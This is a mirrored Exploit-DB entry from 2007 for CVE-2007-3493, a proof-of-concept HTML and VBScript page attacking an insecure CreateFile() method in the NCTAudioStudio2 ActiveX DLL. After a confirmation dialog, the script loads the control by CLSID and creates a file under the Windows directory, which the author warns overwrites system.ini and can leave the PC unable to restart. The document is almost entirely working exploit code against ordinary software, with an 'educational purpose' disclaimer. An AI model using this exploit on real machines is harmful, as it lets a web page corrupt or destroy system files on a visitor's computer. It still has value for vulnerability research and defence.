- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4109
- Проверка EDB
-
- Пройдено
- Автор
- SHINNAI
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2007-3493
- Дата публикации
- 2007-06-26
HTML:
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">--------------------------------------------------------------------------------------------------
<b>NCTAudioStudio2 ActiveX DLL (NCTWavChunksEditor2.dll v. 2.6.1.148) "CreateFile()"Insecure Method</b>
url: http://www.nctsoft.com/products/NCTAudioEditor2/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not be responsible for any damage.
<b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx (for example Sienzo DMM) are vulnerable to this exploits.
--------------------------------------------------------------------------------------------------
<object classid='clsid:A77849B6-6125-4466-88DC-4855C014A0C4' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
On Error Resume Next
Dim MyMsg
If(MsgBox("This was written for educational purpose. Use it at your own risk." & vbCrLf & _
"Author will be not be responsible for any damage." & vbCrLf & vbCrLf & _
"THIS EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY" & _
" OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!" & VBcRlF & "ARE YOU" & _
" SURE YOU REALLY WANT TO RUN THIS EXPLOIT?",4)=vbYes) Then
test.CreateFile "c:\windows\system_.ini"
MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It's overwritten.", 64,"NCTAudioStudio2")
Else
MyMsg = MsgBox ("Nice, be safe!", 64, "NCTAudioStudio2")
End If
End Sub
</script>
</span></span>
</code></pre>
# milw0rm.com [2007-06-26]
- Источник
- www.exploit-db.com